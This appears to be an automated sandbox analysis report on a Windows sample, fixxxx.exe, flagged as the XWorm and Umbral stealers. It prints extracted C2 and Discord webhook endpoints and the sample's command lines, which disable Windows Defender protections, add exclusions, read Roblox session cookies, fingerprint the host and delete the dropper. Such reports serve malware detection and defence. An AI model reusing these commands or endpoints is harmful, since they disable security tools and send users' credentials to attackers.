Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
02-07-2024 15:07
Static task
static1
Behavioral task
behavioral1
Sample
fixxxx.exe
Resource
win7-20240220-en
General
-
Target
fixxxx.exe
-
Size
1.1MB
-
MD5
656c98a712018e49c94e823f1f30d038
-
SHA1
f7400c9f13174b924c822871053fb1efa97a43b6
-
SHA256
136cec1df46a4a97e2358e7b1ddcca2ec2853ecad6e004cbd959844d1e96d0e0
-
SHA512
300b82e08c08391a369706a77907471527a6325909f64ed9c6e316b89f3e0659ddc0619bba1ee857f2b2a14865b3248161079e066ea6f3d6d340617f56a6a068
-
SSDEEP
24576:Ut9UwrSmTCEu3LIy+PtTFngKrh67y8pWaUTNTfkROL6bE:C9PWDIB5Fnfrx8W1hn/
Malware Config
Extracted
xworm
20.ip.gl.ply.gg:53765
-
Install_directory
%AppData%
-
install_file
svchost.exe
Extracted
umbral
https://discord.com/api/webhooks/1257705373842931812/tC0mK-jq5cX6npMOy_YAUDvD9Mp63k-HX1Zs0JwsyvoUpCeh4vfi_Qv8ttDXKYlNJiJD
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0004000000004ed7-33.dat family_umbral behavioral1/memory/1432-37-0x00000000001A0000-0x00000000001E0000-memory.dmp family_umbral -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/2968-1-0x00000000008A0000-0x0000000000C14000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3068 powershell.exe 2184 powershell.exe 2716 powershell.exe 2692 powershell.exe 2452 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts iehjot.exe -
Executes dropped EXE 1 IoCs
pid Process 1432 iehjot.exe -
Loads dropped DLL 1 IoCs
pid Process 2968 fixxxx.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" fixxxx.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 17 discord.com 18 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe 2968 fixxxx.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1732 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2400 PING.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2184 powershell.exe 2716 powershell.exe 2692 powershell.exe 2452 powershell.exe 3068 powershell.exe 788 powershell.exe 1512 powershell.exe 1644 powershell.exe 2392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2968 fixxxx.exe Token: SeDebugPrivilege 2184 powershell.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 2968 fixxxx.exe Token: SeDebugPrivilege 1432 iehjot.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 788 powershell.exe Token: SeDebugPrivilege 1512 powershell.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeIncreaseQuotaPrivilege 648 wmic.exe Token: SeSecurityPrivilege 648 wmic.exe Token: SeTakeOwnershipPrivilege 648 wmic.exe Token: SeLoadDriverPrivilege 648 wmic.exe Token: SeSystemProfilePrivilege 648 wmic.exe Token: SeSystemtimePrivilege 648 wmic.exe Token: SeProfSingleProcessPrivilege 648 wmic.exe Token: SeIncBasePriorityPrivilege 648 wmic.exe Token: SeCreatePagefilePrivilege 648 wmic.exe Token: SeBackupPrivilege 648 wmic.exe Token: SeRestorePrivilege 648 wmic.exe Token: SeShutdownPrivilege 648 wmic.exe Token: SeDebugPrivilege 648 wmic.exe Token: SeSystemEnvironmentPrivilege 648 wmic.exe Token: SeRemoteShutdownPrivilege 648 wmic.exe Token: SeUndockPrivilege 648 wmic.exe Token: SeManageVolumePrivilege 648 wmic.exe Token: 33 648 wmic.exe Token: 34 648 wmic.exe Token: 35 648 wmic.exe Token: SeIncreaseQuotaPrivilege 648 wmic.exe Token: SeSecurityPrivilege 648 wmic.exe Token: SeTakeOwnershipPrivilege 648 wmic.exe Token: SeLoadDriverPrivilege 648 wmic.exe Token: SeSystemProfilePrivilege 648 wmic.exe Token: SeSystemtimePrivilege 648 wmic.exe Token: SeProfSingleProcessPrivilege 648 wmic.exe Token: SeIncBasePriorityPrivilege 648 wmic.exe Token: SeCreatePagefilePrivilege 648 wmic.exe Token: SeBackupPrivilege 648 wmic.exe Token: SeRestorePrivilege 648 wmic.exe Token: SeShutdownPrivilege 648 wmic.exe Token: SeDebugPrivilege 648 wmic.exe Token: SeSystemEnvironmentPrivilege 648 wmic.exe Token: SeRemoteShutdownPrivilege 648 wmic.exe Token: SeUndockPrivilege 648 wmic.exe Token: SeManageVolumePrivilege 648 wmic.exe Token: 33 648 wmic.exe Token: 34 648 wmic.exe Token: 35 648 wmic.exe Token: SeIncreaseQuotaPrivilege 1640 wmic.exe Token: SeSecurityPrivilege 1640 wmic.exe Token: SeTakeOwnershipPrivilege 1640 wmic.exe Token: SeLoadDriverPrivilege 1640 wmic.exe Token: SeSystemProfilePrivilege 1640 wmic.exe Token: SeSystemtimePrivilege 1640 wmic.exe Token: SeProfSingleProcessPrivilege 1640 wmic.exe Token: SeIncBasePriorityPrivilege 1640 wmic.exe Token: SeCreatePagefilePrivilege 1640 wmic.exe Token: SeBackupPrivilege 1640 wmic.exe Token: SeRestorePrivilege 1640 wmic.exe Token: SeShutdownPrivilege 1640 wmic.exe Token: SeDebugPrivilege 1640 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2968 fixxxx.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 2968 wrote to memory of 2184 2968 fixxxx.exe 28 PID 2968 wrote to memory of 2184 2968 fixxxx.exe 28 PID 2968 wrote to memory of 2184 2968 fixxxx.exe 28 PID 2968 wrote to memory of 2184 2968 fixxxx.exe 28 PID 2968 wrote to memory of 2716 2968 fixxxx.exe 30 PID 2968 wrote to memory of 2716 2968 fixxxx.exe 30 PID 2968 wrote to memory of 2716 2968 fixxxx.exe 30 PID 2968 wrote to memory of 2716 2968 fixxxx.exe 30 PID 2968 wrote to memory of 2692 2968 fixxxx.exe 32 PID 2968 wrote to memory of 2692 2968 fixxxx.exe 32 PID 2968 wrote to memory of 2692 2968 fixxxx.exe 32 PID 2968 wrote to memory of 2692 2968 fixxxx.exe 32 PID 2968 wrote to memory of 2452 2968 fixxxx.exe 34 PID 2968 wrote to memory of 2452 2968 fixxxx.exe 34 PID 2968 wrote to memory of 2452 2968 fixxxx.exe 34 PID 2968 wrote to memory of 2452 2968 fixxxx.exe 34 PID 2968 wrote to memory of 1432 2968 fixxxx.exe 39 PID 2968 wrote to memory of 1432 2968 fixxxx.exe 39 PID 2968 wrote to memory of 1432 2968 fixxxx.exe 39 PID 2968 wrote to memory of 1432 2968 fixxxx.exe 39 PID 1432 wrote to memory of 2632 1432 iehjot.exe 40 PID 1432 wrote to memory of 2632 1432 iehjot.exe 40 PID 1432 wrote to memory of 2632 1432 iehjot.exe 40 PID 1432 wrote to memory of 3068 1432 iehjot.exe 42 PID 1432 wrote to memory of 3068 1432 iehjot.exe 42 PID 1432 wrote to memory of 3068 1432 iehjot.exe 42 PID 1432 wrote to memory of 788 1432 iehjot.exe 44 PID 1432 wrote to memory of 788 1432 iehjot.exe 44 PID 1432 wrote to memory of 788 1432 iehjot.exe 44 PID 1432 wrote to memory of 1512 1432 iehjot.exe 46 PID 1432 wrote to memory of 1512 1432 iehjot.exe 46 PID 1432 wrote to memory of 1512 1432 iehjot.exe 46 PID 1432 wrote to memory of 1644 1432 iehjot.exe 48 PID 1432 wrote to memory of 1644 1432 iehjot.exe 48 PID 1432 wrote to memory of 1644 1432 iehjot.exe 48 PID 1432 wrote to memory of 648 1432 iehjot.exe 50 PID 1432 wrote to memory of 648 1432 iehjot.exe 50 PID 1432 wrote to memory of 648 1432 iehjot.exe 50 PID 1432 wrote to memory of 1640 1432 iehjot.exe 52 PID 1432 wrote to memory of 1640 1432 iehjot.exe 52 PID 1432 wrote to memory of 1640 1432 iehjot.exe 52 PID 1432 wrote to memory of 2884 1432 iehjot.exe 54 PID 1432 wrote to memory of 2884 1432 iehjot.exe 54 PID 1432 wrote to memory of 2884 1432 iehjot.exe 54 PID 1432 wrote to memory of 2392 1432 iehjot.exe 56 PID 1432 wrote to memory of 2392 1432 iehjot.exe 56 PID 1432 wrote to memory of 2392 1432 iehjot.exe 56 PID 1432 wrote to memory of 1732 1432 iehjot.exe 58 PID 1432 wrote to memory of 1732 1432 iehjot.exe 58 PID 1432 wrote to memory of 1732 1432 iehjot.exe 58 PID 1432 wrote to memory of 2364 1432 iehjot.exe 60 PID 1432 wrote to memory of 2364 1432 iehjot.exe 60 PID 1432 wrote to memory of 2364 1432 iehjot.exe 60 PID 2364 wrote to memory of 2400 2364 cmd.exe 62 PID 2364 wrote to memory of 2400 2364 cmd.exe 62 PID 2364 wrote to memory of 2400 2364 cmd.exe 62 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2632 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fixxxx.exe"C:\Users\Admin\AppData\Local\Temp\fixxxx.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fixxxx.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fixxxx.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Users\Admin\AppData\Local\Temp\iehjot.exe"C:\Users\Admin\AppData\Local\Temp\iehjot.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\iehjot.exe"3⤵
- Views/modifies file attributes
PID:2632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\iehjot.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:648
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2392
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1732
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\iehjot.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:2400
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52cb3c0bf16ed58d1b05f5fcb617a463c
SHA1d34d098f9d3a7422ebfb0fd86196198c258aa2c7
SHA256cfe2c32b6b0ca41f8fc029d30a1fa8be59b962aaa35d2499120a089103e983cb
SHA51271fb57b49359366669a390cae5b0cdbf8cdf41dfe9b896c35805ac3b53f245cb81f646af61a938e964b90043aa4ed72fe104a032fa77e0ded26e6bc78e773dfe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b23a5d200c0c473bc8f94d78cf84b0dc
SHA117b9a851df8756acb9d2b537e219db4047ff6afa
SHA256e8af3f97ed0c56e58df563050b862889dc3da95e488ea7b9825e9c6ad1df768e
SHA51249e2fe858920cf64ed6a170d3bc0e31c964123dd258995660277d4ea32bda297b7f8deb204c2a33e7cceb707c016cb703704b33709f20ac7bf12feaf9152316c
-
Filesize
231KB
MD5cc9a35c145b9603d30c07fa7995390ea
SHA1e4dd1a40aa0e5a1a7cfae14e76ebab05d51a0b69
SHA2568a18073f8f287ccd1f0cf93ae325e84426073bfd07593ea736e7ec0bb9a35efe
SHA512ee8145b5927c8395455a3ed7bf4f557a66035bdb7354d519045c51ce44a9b39922fa7b2288a6694cbc2a542c2f623ef309ff4d3f5029aea6ee94b9f005120b95